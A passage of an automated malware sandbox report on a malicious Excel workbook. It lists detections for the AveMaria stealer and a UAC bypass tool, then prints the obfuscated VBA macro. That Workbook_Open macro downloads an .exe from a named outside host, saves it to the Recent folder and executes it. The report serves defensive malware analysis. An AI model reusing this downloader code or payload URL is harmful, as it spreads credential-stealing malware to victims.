                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000002.402208161.0000000002996000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              • Rule: JoeSecurity_UACMe, Description: Yara detected UACMe UAC Bypass tool, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                              • Rule: Windows_Trojan_AveMaria_31d2bce9, Description: unknown, Source: 0000000E.00000002.402208161.00000000029B5000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                              Reputation:low
                                              Has exited:true

                                              Target ID:15
                                              Start time:15:45:59
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:true

                                              Target ID:16
                                              Start time:15:45:59
                                              Start date:12/12/2024
                                              Path:C:\ProgramData\msimages.exe
                                              Wow64 process (32bit):true
                                              Commandline:C:\ProgramData\msimages.exe
                                              Imagebase:0x1170000
                                              File size:283'648 bytes
                                              MD5 hash:07472F63BDEC0C4A83767D19B8B7BA19
                                              Has elevated privileges:true
                                              Has administrator privileges:true
                                              Programmed in:C, C++ or other language
                                              Reputation:low
                                              Has exited:false

                                              Call Graph

                                              Module: Module1

                                              Declaration
                                               Line | Content
                                              1

                                              Attribute VB_Name = "Module1"

                                               Line | Instruction | Meta Information
                                              2

                                              Sub book()

                                              4

                                              End Sub

                                              Module: Sheet1

                                              Declaration
                                               Line | Content
                                              1

                                              Attribute VB_Name = "Sheet1"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet2

                                              Declaration
                                               Line | Content
                                              1

                                              Attribute VB_Name = "Sheet2"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: Sheet3

                                              Declaration
                                               Line | Content
                                              1

                                              Attribute VB_Name = "Sheet3"

                                              2

                                              Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                              Module: ThisWorkbook

                                              Declaration
                                               Line | Content
                                              1

                                              Attribute VB_Name = "ThisWorkbook"

                                              2

                                              Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"

                                              3

                                              Attribute VB_GlobalNameSpace = False

                                              4

                                              Attribute VB_Creatable = False

                                              5

                                              Attribute VB_PredeclaredId = True

                                              6

                                              Attribute VB_Exposed = True

                                              7

                                              Attribute VB_TemplateDerived = False

                                              8

                                              Attribute VB_Customizable = True

                                               APIs | Meta Information

                                              Chr

                                              CreateObject

                                              CreateObject("WScript.Shell")

                                              SpecialFolders

                                              CreateObject

                                              CreateObject("microsoft.xmlhttp")

                                              CreateObject

                                              CreateObject("Shell.Application")

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Len

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: InStr

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Open

                                              IXMLHTTPRequest.Open("get","https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe",False)

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Len

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: InStr

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              Part of subcall function \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd@ThisWorkbook: Mid

                                              send

                                              responseBody

                                              Status

                                              IXMLHTTPRequest.Status() -> 200

                                              CreateObject

                                              CreateObject("adodb.stream")

                                              Open

                                              Stream.Open()

                                              Type

                                              Write


                                              SaveToFile

                                              Close

                                              Open

                                              IShellDispatch6.Open("C:\Users\Albus\AppData\Roaming\Microsoft\Windows\Recent\VPZVQXDUT.exe")
                                               Strings | Decrypted Strings
                                              "200"
                                              "WScript.Shell"
                                              "Recent"
                                              "microsoft.xmlhttp"
                                              "Shell.Application"
                                              "get"
                                              "h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5dj\xc3g\xd5\xc5zlk\xc3\xd2k\xc5zk\xc3\xc5g\xc0\xd5\xd2\xc2\xc0\xc5\xd3\xd5\xe2Nbg\xd5\xd4gg\xd6\xc2h\xdc/d\xdchd\xc3\xdcjd\xd5\xc3\xd6j\xd5\xc2\xd6\xc0w\xd6w\xc2w\xc0\xdc\xd4\xdcgh\xd5d\xd6\xdc\xd5\xd4\xdc\xc0\xd6w\xc2w\xd6\xd4\xd6\xc0/\xc0g\xc0\xd5d\xd4h\xd5\xd6jh\xdc\xc3jgh\xd5\xd4g\xc0\xd4\xc2g\xc0\xc3j\xdchd\xc3h\xd5\xd6\xd5h/\xdcd\xc3\xc1\xd6\xdc\xdb\xd4g\xd6\xd5\xc2\xd4\xd6\xd4\xd5\xc2z/\xc0\xd5\xdbh\xc3zdhhz.\xc2\xdb\xc2"
                                              "adodb.stream"
                                              "adodb.stream"
                                               Line | Instruction | Meta Information
                                              34

                                              Sub Workbook_Open()

                                              35

                                              Dim WshShell as Object

                                              executed
                                              36

                                              Dim GetUserDesktop as String

                                              37

                                              Dim \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0 as Integer

                                              38

                                              \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0 = Chr(50) + Chr(48) + Chr(48)

                                              Chr

                                              41

                                              Set WshShell = CreateObject("WScript.Shell")

                                              CreateObject("WScript.Shell")

                                              executed
                                              42

                                              GetUserDesktop = WshShell.SpecialFolders("Recent")

                                              SpecialFolders

                                              43

                                              Dim \xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa

                                              44

                                              Dim \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5

                                              45

                                              Dim \xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac

                                              46

                                              Dim \xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8

                                              47

                                              Dim \xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf

                                              48

                                              Dim \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb as Integer

                                              49

                                              Dim \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8

                                              50

                                              Dim \xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc

                                              51

                                              \xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8\xb9\xa4\xa5\xbf\xb9\xaa\xbf\xba\xae\xa7\xbd\xbd\xb6\xb6\xa9\xa4\xb4\xaa\xb2\xab\xb4\xbe\xaa\xbe\xbc\xb9\xab\xae\xb0\xa9\xa3\xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb = 1

                                              56

                                              Set \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8 = CreateObject("microsoft.xmlhttp")

                                              CreateObject("microsoft.xmlhttp")

                                              executed
                                              57

                                              Set \xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf = CreateObject("Shell.Application")

                                              CreateObject("Shell.Application")

                                              executed
                                              59

                                              \xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8\xba\xa7\xb4\xab\xb5\xbb\xb7\xac\xb8\xa9\xbc\xac\xa9\xab\xa5\xb6\xbe\xac\xab\xa5\xb9\xb6\xa8\xa7\xbc\xaf\xa3\xb2\xa5\xbe\xbb\xbc\xbb\xbe\xb5\xb9\xbd\xa8\xb8\xb8\xae\xbb\xbd\xb8\xa8 = GetUserDesktop + \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd("\V\xb6ZVQX\xe2\xdaT.\xc2\xdb\xc2")

                                              60

                                              \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.Open "get", \xb0\xa2\xb6\xbf\xaf\xa2\xa2\xb5\xac\xb7\xa6\xb3\xa8\xa5\xb7\xbb\xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd("h\xd6\xd6\xd3\xd5://www.\xd5\xd6\xc4\xd3\xc0m\xc0\xc5\xc0.\xc1\xd2m/\xd5dj\xc3g\xd5\xc5zlk\xc3\xd2k\xc5zk\xc3\xc5g\xc0\xd5\xd2\xc2\xc0\xc5\xd3\xd5\xe2Nbg\xd5\xd4gg\xd6\xc2h\xdc/d\xdchd\xc3\xdcjd\xd5\xc3\xd6j\xd5\xc2\xd6\xc0w\xd6w\xc2w\xc0\xdc\xd4\xdcgh\xd5d\xd6\xdc\xd5\xd4\xdc\xc0\xd6w\xc2w\xd6\xd4\xd6\xc0/\xc0g\xc0\xd5d\xd4h\xd5\xd6jh\xdc\xc3jgh\xd5\xd4g\xc0\xd4\xc2g\xc0\xc3j\xdchd\xc3h\xd5\xd6\xd5h/\xdcd\xc3\xc1\xd6\xdc\xdb\xd4g\xd6\xd5\xc2\xd4\xd6\xd4\xd5\xc2z/\xc0\xd5\xdbh\xc3zdhhz.\xc2\xdb\xc2"), False

                                              IXMLHTTPRequest.Open("get","https://www.stipamana.com/sdjfgsnzlkfoknzkfngasoeanpsDNbgsrggtehy/dyhdfyjdsftjsetawtwewayryghsdtysryatwewtrta/agasdrhstjhyfjghsrgaregafjyhdfhstsh/ydfctyxrgtsertrsez/asxhfzdhhz.exe",False)

                                              executed
                                              61

                                              \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.send

                                              send

                                              62

                                              \xb6\xa7\xa9\xa9\xaa\xa7\xbe\xba\xbe\xb2\xae\xb9\xac\xaa\xa8\xae\xb2\xac\xb6\xa3\xa6\xac\xa1\xa6\xab\xa4\xb3\xa7\xa8\xbf\xb8\xa7\xb6\xbd\xa9\xbb\xa9\xbd\xbf\xb0\xa7\xa9\xac\xa2\xa3\xba\xa7\xb7\xbb\xb8\xbf\xae\xa5\xb8\xb9\xbe\xab\xae\xb4\xbd\xa7\xb5\xaf\xbd\xb7\xa5\xb0\xb0\xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5 = \xa1\xb3\xa6\xaa\xa6\xbc\xab\xac\xa3\xa1\xb2\xa4\xbb\xaa\xaf\xb7\xa4\xa3\xb9\xa5\xa2\xb7\xbc\xa6\xb3\xa6\xae\xb3\xbf\xbf\xb0\xaa\xb0\xa8\xa6\xba\xa6\xb2\xa3\xb8\xb7\xab\xb3\xaf\xbc\xba\xaf\xa4\xb5\xae\xba\xbf\xa1\xa4\xbd\xbe\xb3\xbf\xac\xa8\xaf\xb5\xba\xba\xb9\xbc\xa5\xa1\xb4\xa9\xa2\xa2\xb8\xba\xbb\xb6\xaa\xa1\xa5\xaf\xb6\xb7\xab\xb5\xb8\xaf\xbe\xb4\xbc\xa4\xa4\xbc\xae\xa6\xbb\xa8.responseBody

                                              responseBody

                                              63

